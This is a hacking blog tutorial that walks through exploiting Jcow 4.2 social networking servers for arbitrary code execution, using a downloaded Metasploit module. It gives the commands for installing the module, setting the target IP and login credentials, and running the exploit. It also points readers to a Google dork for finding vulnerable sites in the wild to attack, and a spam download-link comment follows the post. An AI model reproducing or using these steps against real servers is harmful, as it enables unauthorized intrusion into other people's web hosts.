Trending
Loading...

Social Networking Web Server Hacking

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

By : ABHISHEK GUPTA


After very long times I didn't write about hacking webserver, today "again" when surfing around I've found that Jcow Social netwoking engine can be exploited and the exploit ranking marked as "excellent".

So actually what happen when you have this Jcow vulnerable version??The simple thing is the attacker can go through your web server directory and doing everything there. For example if you hosting your Jcow vulnerable version(on unsecure hosting also :-) ) you can own your web server directory.
In this example, let's say I have a Jcow vulnerable web server in IP address 192.168.8.94. Actually it's better to try installing your own web server, but if you want to find out Jcow in the wild you can search through Google dork "intext:Powered by Jcow 4.2.0" and register as normal user there. In this tutorial I have already register as username : victim and password also victim :-)
Okay I hope you understand what I say above :-P to make it more realistic, let's try the tutorial…

Level : Medium

Victim Server : work fine if victime use Windows XP SP3
Victim vulnerable application : JCow 4.2
Attacker O.S : obiously you need Backtrack 5 R1

Requirement :

Here only you need bellow two item.
Which is your actual need.
1#. Metasploit framework

2.# Jcow.rb exploit mediafire.com
Now lets start this article.

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution Process:

1.# first of all you simly  Copy the 
downloaded jcow.rb exploit from the 

download link above and copy it into /pentest/exploits/framework/modules/exploits/remote/ folder(for example see the command below).
cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/
now you see the text "framework" in blue color it's only because I'm using 
Backtrack 5 R1 and using metasploit 
v4.0.1, so the name was depends on 
your Metasploit version, maybe on your 
computer it can be "framework3" or 
"framework2" so on..so dont have
confused.

2.# now when you copy successfully 
after that,simply  Open your Metasploit 
console and then use the exploit you just added before see bellow 

msf > use exploit/remote/jcow
3.# now when you complete step 2 , The 
next step we need to view the available 
switch for this exploit by running show 

options command, and then configured it(see the text with red color).

msf  exploit(jcow) > set rhost 192.168.8.94 --> set the target IP
rhost => 192.168.8.94
msf  exploit(jcow) > set username victim --> set the usernameusername => victim
msf  exploit(jcow) > set password victim --> set the passwordpassword => victim
msf  exploit(jcow) > set uri jcow --> only if jcow not in/directory fill it here
uri => jcow
Importent:::?

Set uri can be used if jcow was not 
installed on webserver main directory
for example http://web-server.com/jcow.

4#. now your work has been almost  
done ,After everything was set up 
successfully, the next thing to do was 
exploiting or running the exploit by using
  exploit command.

2 comments:

  1. Your style is unique compared to other folks I've read stuff from.
    I appreciate you for posting when you have the opportunity, Guess I'll just bookmark this blog.

    ReplyDelete
  2. Social Networking Web Server Hacking - Hacksandcracks >>>>> Download Now

    >>>>> Download Full

    Social Networking Web Server Hacking - Hacksandcracks >>>>> Download LINK

    >>>>> Download Now

    Social Networking Web Server Hacking - Hacksandcracks >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete

please feel free to comment

Copyright © 2012 HacksandCracks All Right Reserved
Designed by Odd Themes
Back To Top